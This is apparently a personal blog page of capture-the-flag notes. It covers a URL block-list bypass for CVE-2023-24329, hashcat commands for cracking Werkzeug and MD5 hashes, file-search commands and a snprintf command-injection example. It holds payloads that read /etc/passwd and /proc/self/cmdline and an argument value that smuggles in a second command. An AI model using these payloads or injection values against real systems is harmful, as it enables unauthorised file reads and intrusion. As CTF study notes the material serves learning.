CTF Notes: 2024-04-28 CVE-2023-24329 RSA cracking CMD injection
CVE-2023-24329
To bypass: simply put a space before the blocked domain
e.g given the following block list
blocked_list = [
"http://example.com/",
"http://example2.com/"
]
To bypass, the payload can be
" http://example.com/"
" file:///etc/passwd"
" file:///proc/self/cmdline"
" ftp://<username>:<password>@<domain-name>/<file-name>"
Generate RSA private key from OPENSSH private key
> ssh-keygen -p -N "" -m pem -f private.key
Enter old passphrase: <enter-passphrase>
Key has comment '<comment>'
Your identification has been saved with the new passphrase.
Cracking hashes
- Python Werkzeug SHA256 (HMAC-SHA256 (key = $salt))
- Ref: https://hashcat.net/wiki/doku.php?id=example_hashes
30120 Python Werkzeug SHA256 (HMAC-SHA256 (key = $salt)) sha256$70108387805$8b9472281c36c3a693703de0
To crack
> hashcat -m 30120 hash_file wordlist_file
- MD5 given partial plaintext Suppose there is a given md5 hash and some partially given plain text
> hashcat hash_file -a 3 -m 0 -1 ?l?u?d?s PLAINTEXT?1?1?1
Useful search method
- Find files modified since 2024-04-1 and exclude some paths
> find / -type f -newermt '2024-04-01' -not -path "/usr/*" -not -path "/sys/*" -not -path "/proc/*" -not -path "/run/*" -not -path "/boot/*" -not -path "/var/lib/*" -ls 2>/dev/null
- Find files owned by a user
> find / -type f -user <username> 2>/dev/null
- grep all files for keyword under a folder even if they are compressed
> zgrep -i keyword /file/path/*.gz
cmd injection
A safe use of snprintf
snprintf(buf, sizeof buf, "%s", argv[1]);
However, if the formatted string contains an os command, then argv[1]
can be used for cmdi
snprintf(buf, sizeof(buf), "cmd -i %s", argv[1]);
# e.g argv[1]: file_path;<cmd>
Support meowmeow
If you find this article useful, please support: https://www.buymeacoffee.com/meowmeowattack